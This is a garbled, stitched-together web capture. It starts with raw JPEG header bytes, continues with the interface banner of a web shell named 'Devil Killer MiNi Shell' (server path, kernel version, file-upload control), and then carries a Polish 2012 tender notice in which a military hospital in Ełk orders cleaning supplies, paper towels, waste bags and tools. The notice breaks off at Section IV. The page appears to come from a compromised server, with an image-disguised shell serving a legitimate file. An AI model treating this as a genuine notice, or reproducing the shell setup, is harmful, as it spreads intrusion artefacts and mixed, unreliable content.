JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121204/255611-N-2012.html

<p class="kh_header"><b>Ełk: Dostawa środków czystości, materiałów i drobnego sprzętu do utrzymania higieny oraz worków na odpady. Numer sprawy: 03/2013-DZP/PNO.</b><br>
<b>Numer ogłoszenia: 255611 - 2012; data zamieszczenia: 04.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 108 Szpital Wojskowy z Przychodnią SP ZOZ , ul. Kościuszki 30, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 087 6219803, faks 087 6219807.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.108spzoz.elk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków czystości, materiałów i drobnego sprzętu do utrzymania higieny oraz worków na odpady. Numer sprawy: 03/2013-DZP/PNO..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje 9 Zadań.
	Przedmioty dostawy zamieszczone w ofercie powinny posiadać dokładny i czytelny opis przedmiotu zamówienia na opakowaniu oraz stosowne certyfikaty lub atesty dopuszczające 
ich stosowanie w służbie zdrowia zgodnie z polskim prawem oraz prawem Unii Europejskiej (powinny odpowiadać określonym normom lub specyfikacjom technicznym, posiadać aktualne świadectwo dopuszczenia do obrotu oferowanych środków wymagane prawem).
	Przedmioty dostawy zamieszczone w ofercie powinny być bezpieczne w użyciu dla pacjentów oraz dla personelu.
	Oznakowanie dostarczonych wyrobów, instrukcje użytkowania, opis wyrobu, etykiety (oryginalne) muszą być sporządzone w języku polskim.

	Zamawiający zastrzega sobie prawo zakupu mniejszych ilości towaru niż podane 
w Załącznikach Nr 2.

	Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent czy pochodzenie - należy przyjąć, że Zamawiający podał taki opis ze wskazaniem na typ 
i dopuszcza składanie ofert równoważnych o parametrach techniczno  eksploatacyjno  użytkowych nie gorszych niż , podane w opisie przedmiotu zamówienia. Podstawa prawna: art. 29 ust. 3 Ustawy Prawo Zamówień Publicznych.

ZADANIE NR 1 - ŚRODKI CZYSTOŚCI

Środek do mycia lodówek umożliwiający mycie chłodni bez konieczności rozmrażania, wymagany dobry efekt w tem.-30 C 	butelka po 1 l	L	6
Łagodny środek czyszczący zawierający alkohol etylowy i kwasy sulfonowe pH9,5. Nadaje się do stosowania na wszystkie powierzchnie również ponad podłogą (PCV, linoleum, tworzywa sztuczne, szkło)jak i mycia maszynowego, stężenie robocze 0,25%,-0,75ml. Wymagane urządzenia naścienne dozujące w ilości 12 szt.	karnister po 10 l	L	1650
Uniwersalny środek do czyszczenia łazienek i sanitariatów pH0,4,posiadający konsystencję żelu, szybko i skutecznie usuwający wszystkie zanieczyszczenia typowe dla łazienek i sanitariatów, usuwa kamień i rdzę, stosowanie: zabrudzenia normalne 2-3 dozowania (10-20 ml. na 10 litrów wody, zabrudzenia silne roztwór stężony lub czysty koncentrat, np. Tasonil Ultra Fresh Wymagane urządzenia naścienne dozujące w ilości 12 szt.	karnister po 10 l	L	920
Środek  do pielęgnacji stali  nierdzewnej, szybki i skutecznie usuwający zabrudzenia np., odciski palców i zamazy, nadający połysk i nie pozostawiający tłustych powłok pH6-7, nie zawiera skład. szorujących, zastosowanie: windy, urządzenia kuchni	butelka po 500 ml	L	80
Środek do gruntownego mycia wodoodpornych wykładzin podłogowych  z wosków  i polimerów, np. LINAX  PLUS, 	karnister po 10 l	L	120
Środek do pielęgnacji podłóg - dyspersja pielęgnacyjna odporna na działanie środków dezynfekcyjnych do zastosowania w obszarach szczególnych wymaganiach higienicznych tj., blok operacyjny, gabinety , zabiegowe. wartość pH9, sposób użycia 2-3 krotnie nanieść na uprzednio gruntownie wyczyszczoną podłogę np. LONGLIFE HOSPITAL	karnister po 10 l 	L	120
Uniwersalny środek czyszczący ,nadaje się czyszczenia  odpornych na działanie wody powierzchni, bez trudu usuwa tłuszcz, oleje, i inne zabrudzenia, szczególnie przydatny w pomieszczeniach kuchni żywienia zbiorowego, nie szkodzi w środowisku ,posiada atest PZH, stosowanie  roztwór 0.5-1 % (40-80 ml. na 8 litrów wody) może być stosowany do zmywania ręcznego jak i w automatach czyszczących, pH 10,5-11  np., AZ 70, Wymagane urządzenia naścienne dozujące w ilości 12 szt.	karnister po 10 l	L	500
Uniwersalny środek czyszczący, nadaje się czyszczenia  odpornych na działanie wody powierzchni, bez trudu usuwa tłuszcz, oleje, i inne zabrudzenia, szczególnie przydatny w pomieszczeniach kuchni żywienia zbiorowego, nie szkodzi w środowisku ,posiada atest PZH, stosowanie roztwór 0.5-1 %(40-80 ml. na 8 litrów wody ) może być stosowany do zmywania ręcznego jak i w automatach czyszczących, pH 10,5-11  np., AZ 70, Wymagane nakręcane urządzenia dozujące - 12 szt.	butelka po 1 l	L	24
Środek do mycia podłóg, szybko i skutecznie usuwa zanieczyszczenia wszelkiego rodzaju, substancje natłuszczające, nadaje się również  do powierzchni pielęgnowanych emulsjami, zapobiega ślizganiu, sposób użycia: roztwór 1-2 % (100-200 ml. preparatu na 10 l roztworu roboczego ) np.FR 66, Wymagane urządzenia naścienne dozujące w ilości 12 szt.	karnister po 10 l	L	170
Płyn do mycia naczyń - środek myjący do ręcznego zmywania naczyń, pozytywnie przetestowane działanie na skórę rąk, 	karnister po 5 l	L	650
Mydło w płynie  do mycia rąk o delikatnym zapachu, pH neutralne, przebadane dermatologicznie do dozowników, 	karnister po 5 l	L	1560
Zagęszczony środek do dezynfekcji nawierzchni ,posadzek podłogowych i urządzeń  kuchennych właściwościach bakterio-i grzybobójczych  miejscach przygotowania posiłków,  postać bezbarwny gęsty płyn, 	karnister po 5 l	L	500
Zagęszczony środek do dezynfekcji nawierzchni ,posadzek podłogowych i urządzeń  kuchennych właściwościach bakterio-i grzybobójczych  miejscach przygotowania posiłków,  postać bezbarwny gęsty płyn, 	butelka po 1 l	L	124
Środek/mleczko do szorowania powierzchni, szczególna zdolność rozpuszczania brudu i tłuszczu .zawierający aktywny tlen, ph 10-10,8	butelka po 500 ml	L	156
Środek do rozpuszczania osadów wapniowych w wyparzarkach kuchennych, 	butelka po 1 l 	L	112
Odplamiacz do wykładzin  dywanowych wykazujące działanie antybakteryjne	 po 1 l	L	10
Spray do czyszczenia mebli biurowych typu biurka, szafy, regały np. Pronto 	 po 400 ml	SZT	85
Płyn czyszcząco - dezynfekujący do WC zapobiegający powstawaniu osadów, zanieczyszczeń, zwalczający drobnoustroje np. Domestos	butelka po 1 l	L	75
Płyn do czyszczenia szyb z spryskiwaczem	 po 500 ml	SZT	230
Żel do czyszczenia urządzeń sanitarnych w toaletach WC o wartości pH ok.2,2  np. WC Palemka 	butelka po 1 l	L	117
Środek do usuwania zapieczonego tłuszczu w piekarnikach (piec konwekcyjny), 	 po 1 l	L	10
Pasta do zabrudzeń długotrwałych, skutecznie usuwająca naloty rdzy, kamienia i kamienia wodnego np. Pasta Sama, 	opakowanie po 250 g	SZT	260
Środek do usuwania kamienia i rdzy, 	butelka po 1 l	L	20
Tabletki do zmywarki np. Calgonit  	po 56 tabletek	OP	50
Kostka do wc	40 g	SZT	80
Mydło kostka 	100 g	SZT	180
Ekologiczny preparat do szamb np..Biosanit	500 g	SZT	1
Proszek do udrażniania rur	500 g	SZT	10


UWAGA: Warunki dodatkowe
1. Zamawiający wymaga do pozycji 2, 3, 7, 9 niniejszego formularza cenowego urządzeń dozujących ściennych - dozowniki w ilości 12 szt. System rozcieńczania detergentów przeznaczony do dozowania min. 3 środków chemicznych z kompletem zestawu końcówek, pozwalających na przygotowanie roztworów o stężeniu od 0,1%do13%. Wykonawca zobowiązuje się do użyczenia urządzeń dozujących na czas trwania umowy, przygotowujących automatycznie roztwór roboczy 
2	Preparaty opisane w w niniejszym Zadaniu w zależności do jakiej kategorii zostały zarejestrowane przez producentów muszą odpowiadać aktualnym przepisom obowiązującym na terenie RP., ze szczególnym uwzględnieniem:
- Ustawa o substancjach i preparatach chemicznych (Dz. U. Nr 11, poz. 84 z dnia 14.02.2001 wraz z późniejszymi rozporządzeniami, np.: wystawiania kart charakterystyki preparatów niebezpiecznych),
- Ustawa o opakowaniach i odpadach opakowaniowych (Dz. U. Nr 63, poz. 638 z dnia 22.06.2001 z późniejszymi zmianami i rozporządzeniami). Wymagana informacja o kodzie odpadu opakowaniowego oraz o sposobie postępowania z opakowaniami po produktach chemicznych. W przypadku opakowań po produktach niebezpiecznych ze znakiem ostrzegawczym N i T sprzedający zagwarantuje odbiór opakowań.
3	WYMAGANA ULOTKA INFORMACYJNA O KAŻDYM PRODUKCIE, SPOSOBIE JEGO UŻYCIA ORAZ SKŁADZIE CHEMICZNYM DO SKŁADANEJ OFERTY PRZETARGOWEJ. NA DOŁĄCZONYM DOKUMENCIE W PRAWYM GÓRNYM ROGU NALEŻY WPISAĆ NUMER POZYCJI PRZEDMIOTU ZAMÓWIENIU.
4	Wymagane przekazanie kart charakterystyki preparatów niebezpiecznych wraz z umową (z chwilą podpisania umowy)  w formie elektronicznej na płycie CD. Wykonawca zobowiązany będzie również w trakcie trwania umowy do powiadomienia Zamawiającego o wszelkich aktualizacjach informacji zawartych w kartach charakterystyki preparatów niebezpiecznych.

Za produkt równoważny uważa się produkt o gramaturze nie niższej niż podana w opisie przedmiotu zamówienia, posiadający te same walory organoleptyczne - zapach, barwa, konsystencja, zawierające w swoim składzie nie gorsze surowce użyte do produkcji, przeznaczony do uzyskania takich samych efektów z użytkowania. 
ZADANIE NR 2 - PAPIER TOALETOWY I RĘCZNIKI

Papier toaletowy - rolka duża ,1-warstwowy , szary, dł. wstęgi -min.100mb,szer.wstęgi-10cm,śr.-6 cm	SZT	3800
Papier toaletowy -rolka standardowa ,1-warstwowy,szary,dł.wstęgi -min.36mb,szer.wstęgi 10cm.,śr.tulei.-3,5-4cm,	SZT	3000
Ręczniki papierowe ZZ,1-warstwowy,szer. liska 23 cm., dł. listka -25 cm, w kartonach po 4000 szt. listków, kolor zielony,	KARTON	250
Ręczniki papierowe rolka kuchenna 23 cm.,2-warstwowe, kolor biały, min 16 mb, 	SZT	8000

UWAGA: Warunki dodatkowe
1	WYMAGANA ULOTKA INFORMACYJNA O KAŻDYM PRODUKCIE, DO SKŁADANEJ OFERTY PRZETARGOWEJ. NA DOŁĄCZONYM DOKUMENCIE W PRAWYM GÓRNYM ROGU NALEŻY WPISAĆ NUMER POZYCJI PRZEDMIOTU ZAMÓWIENIU.


ZADANIE NR 3 - WORKI FOLIOWE NA ODPADY
Worki foliowe na odpady, wymiary 35 l. Kolor - niebieski	rolki po 50 szt.	ROLKA	1250
Worki foliowe na odpady, wymiar 60 l Kolor niebieski	rolki po 50 szt.	ROLKA	25
Worki foliowe na odpady, wymiar 120 l. Kolor niebieski	rolki po 25 szt.	ROLKA	1200
Rękawice ochronne  latexowe, Kolor żółty Rozmiar - S	 po 100 szt. 	OP.	60
Rękawice ochronne  latexowe, Kolor żółty Rozmiar -M	  po 100 szt.	OP.	86
Worki foliowe na odpady medyczne, wymiar 35 l ,do spalania kolor czerwony	rolki po 50 szt.	ROLKA	600
7	Worki foliowe na odpady, wymiar 240 l.  Kolor czarny lub niebieski	rolki po 10 szt.	ROLKA	20
Worki foliowe na odpady medyczne; Wymiar 120 l,, do spalania, Kolor czerwony	rolki po 25 szt.	ROLKA	820
Worki foliowe na odpady medyczne, Wymiar 60 l.  Kolor czerwony do  spalania  	rolki po 50 szt.	ROLKA	10
Rękawice jednorazowe foliowe	po 100 szt.	OP.	5
Rękawice ochronne bawełniane 5-palcowe	para	PARA	40
Worki foliowe n a odpady med. 35 l, kolor żółty do spalania	rolki po 50 szt.	ROLKA	150
Worki foliowe na odpady med.120l kolor żółty do spalania	rolki po 25 szt.	ROLKA	50


ZADANIE NR 4 - URZĄDZENIA DO SPRZĄTANIA
Stelaż do mopa płaskiego kieszeniowego, ściskowy uchwyt do kija z zatrzaskiem, łatwy w nożnej obsłudze, szerokość 40 cm	SZT	50
MOP nakładka  kieszeniowo-taśmowy 40 cm. Bawełniany,	SZT	1265
Szczotka do sedesu z pojemnikiem	SZT	55
Mata podłogowa wejściowa	SZT	3
Kij drewniany 140 cm	SZT	15
Szczotka  do kurzu z mikkrofibrą	SZT	100
Szczotka do szorowania ręcznego duża z uchwytem	SZT	35
Szczotka do zamiatania 28,5 cm, drewniana +kij drewniany , włosie mieszane	SZT	30
Szczotka ryżowa 22 cm + kij Drewniana ,kij drewniany 120cm.	SZT	20
Zestaw do mycia okien. Uchwyt do mycia ,nakładka do mycia, ściągaczka	SZT	36
Drążek aluminiowy do nakładek na mop teleskopowy 3m (2-łącznikowy)	SZT	25
Ściereczki z mikrofazy 36x36 a3 szt. Trzy kolory	SZT	335
Gąbka garnkowa do szorowania 7x15cm	SZT	200
Wiadro do mopa 18 l z wyciskaczem	SZT	10
Wiadro plastikowe 16 l.	SZT.	20
Szmaty do podłogi bawełniane 60x80	SZT.	40
Druciak spiralny netinox /duży/	SZT.	80
Zmywak Stella A-5	OP	50
Ścierka ostra duża	SZT.	30
Ścierka prima jak bawełna A-10 maxi	OP	12
MOP sznurkowy bawełniany /długi/	OP	15
Worki do odkurzacza NUMATIC NVH 180 RSV /a-10 szt./	OP	10

ZADANIE NR 5 - ŚRODKI PIORĄCE
Proszek biały zwykły (kolor, biały), 	 po 20 kg	KG	2880
Sól tabletkowana, opakowanie (NaCl) 	po 25 kg	KG	900
Wybielacz do tkanin np. OXYGENOL, 	karnister po 30 kg	KARNISTER	2
Płynny środek powierzchniowo-czynny do usuwania naturalnych zabrudzeń olejowych i tłuszczowych np. DERMASIL PLUS, 	karnister po 20 kg	KARNISTER	2
Środek do dezynfekcji bielizny, np. OZONIT, 	karnister po 20 kg	KARNISTER	2
Płyn do płukania tkanin, np. Bławatek 	karnister po 4 l	L	152
Płyn do odplamiania  ręcznego, opakowanie /np. Remus/	po 1 l.	L	30
Pasta BHP	po 0,5 kg	KG	20
Wybielacz np. YPLON karnister 	po 5 l	KARNISTER	7
Płyn do prania karnister                                                      	po 4 l	KARNISTER	12
Płyn Ludwik karnister	po 5 l	KARNISTER	14

UWAGA: Warunki dodatkowe	
1	Preparaty opisane w w niniejszym Zadaniu w zależności do jakiej kategorii zostały zarejestrowane przez producentów muszą odpowiadać aktualnym przepisom obowiązującym na terenie RP., ze szczególnym uwzględnieniem:
- Ustawa o substancjach i preparatach chemicznych (Dz. U. Nr 11, poz. 84 z dnia 14.02.2001 wraz z późniejszymi rozporządzeniami, np.: wystawiania kart charakterystyki preparatów niebezpiecznych),
- Ustawa o opakowaniach i odpadach opakowaniowych (Dz. U. Nr 63, poz. 638 z dnia 22.06.2001 z późniejszymi zmianami i rozporządzeniami). Wymagana informacja o kodzie odpadu opakowaniowego oraz o sposobie postępowania z opakowaniami po produktach chemicznych. W przypadku opakowań po produktach niebezpiecznych ze znakiem ostrzegawczym N i T sprzedający zagwarantuje odbiór opakowań.
2	Wymagane przekazanie kart charakterystyki preparatów niebezpiecznych wraz z umową (z chwilą podpisania umowy)  w formie elektronicznej na płycie CD. Wykonawca zobowiązany będzie również w trakcie trwania umowy do powiadomienia Zamawiającego o wszelkich aktualizacjach informacji zawartych w kartach charakterystyki preparatów niebezpiecznych.
3	WYMAGANA ULOTKA INFORMACYJNA O KAŻDYM PRODUKCIE, SPOSOBIE JEGO UŻYCIA ORAZ SKŁADZIE CHEMICZNYM DO SKŁADANEJ OFERTY PRZETARGOWEJ. NA DOŁĄCZONYM DOKUMENCIE W PRAWYM GÓRNYM ROGU NALEŻY WPISAĆ NUMER POZYCJI PRZEDMIOTU ZAMÓWIENIU.
4	Wymagane przekazanie kart charakterystyki preparatów niebezpiecznych wraz z umową (z chwilą podpisania umowy) w formie elektronicznej na płycie CD. Wykonawca zobowiązany będzie również w trakcie trwania umowy do powiadomienia Zamawiającego o wszelkich aktualizacjach informacji zawartych w kartach charakterystyki preparatów niebezpiecznych.
Za produkt równoważny uważa się produkt o gramaturze nie niższej niż podana w opisie przedmiotu zamówienia, posiadający te same walory organoleptyczne - zapach, barwa, konsystencja, zawierające w swoim składzie nie gorsze surowce użyte do produkcji, przeznaczony do uzyskania takich samych efektów z użytkowania. 

ZADANIE NR 6 - WÓZKI DO SPRZĄTANIA I DEZYNFEKCJI

1.Wózek do sprzątania i dezynfekcji:
- wiadro 24L
- wiadro 16L
- wyciskarka doczołowa (boczny odpływ wody)
- 2 kuwety 10L
- 2 wiaderka 6L
- uchwyt na worek 2x70L	SZT	10
2	Kosz uchylny 15 l	SZT	30

UWAGA: Warunki dodatkowe	
1	WYMAGANA ULOTKA INFORMACYJNA O KAŻDYM PRODUKCIE, DO SKŁADANEJ OFERTY PRZETARGOWEJ. NA DOŁĄCZONYM DOKUMENCIE W PRAWYM GÓRNYM ROGU NALEŻY WPISAĆ NUMER POZYCJI PRZEDMIOTU ZAMÓWIENIU.


ZADANIE NR 7 - ASORTYMENT JEDNORAZOWY (KUBECZKI SZTUĆCE TALERZE)


Torebki foliowe do żywności HDPE 22x26	1000 szt.	OP	8
Torebki foliowe do żywności HDPE 26x35	1000 szt.	OP	8
Kubki jednorazowe /do ciepłego/ pojemność 0,200 l.	100 szt.	OP	20
Kubki jednorazowe, pojemność 0,200 l.	100 szt.	OP	25
Talerz jednorazowy płaski	100 szt.	OP	10
Flaczarka jednorazowa, pojemność 0,300 l.	100 szt.	OP	10
Widelec jednorazowy 	100 szt.	OP	10
Łyżka jednorazowa 	100 szt.	OP	10
Nóż jednorazowy 	100 szt.	OP	10
Łyżeczka jednorazowa 	100 szt.	OP	5
Serwetki gastronomiczne białe	500 szt.	OP	50
Talerz jednorazowy deserowy	100 szt	OP	5






ZADANIE NR 8 - OBUWIE JEDNORAZOWE OCHRONNE

1	Obuwie ochronne jednorazowe pakowane  po   jednej    parze   w    kulce (wykonane ze specjalnej antyelektrostatycznej i antypoślizgowej folii, w kostce ściągnięte gumką w rozmiarze uniwersalnym)	SZT	40000


ZADANIE NR 9 - DROBNY SPRZĘT GOSPODARCZY

Grabie plastikowe  proste do liści 	SZT	4
Łopata do śniegu PCV /wzmocniona, szeroka/ z trzonkiem	SZT	5
Łopata do śniegu - sklejka	SZT	10
Szpadel prosty metalowy z trzonkiem	SZT	3
Łopata węglowa z trzonkiem	SZT	3
Grabie plastikowe wachlarzowe	SZT	4
Szczotka do zamiatania chodników /szer.40-50 cm/ z trzonkiem	SZT	5
Miotły brzozowe	SZT	100
39800000-0 Środki czyszczące i polerujące
33760000-5 Papier toaletowy, chusteczki higieniczne, ręczniki do rąk i serwety
33761000-2 Papier toaletowy
33763000-6 Ręczniki papierowe do rąk
18930000-7 Worki i torby
39224000-8 Miotły szczotki i inne artykuły różnego rodzaju
39831000-6 Preparaty piorące
39222100-5 Artykuły cateringowe jednorazowe
18830000-6 Obuwie ochronne.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 33.46.00.00-5, 33.76.10.00-2, 33.76.30.00-6, 18.93.00.00-7, 39.22.40.00-8, 39.83.10.00-6, 39.22.21.00-5, 18.83.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca wraz z ofertą zobowiązany będzie złożyć również dokumenty nie wymienione powyżej takie jak: 1)   Formularz ofertowy 
2)   Formularze cenowe 3)  Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
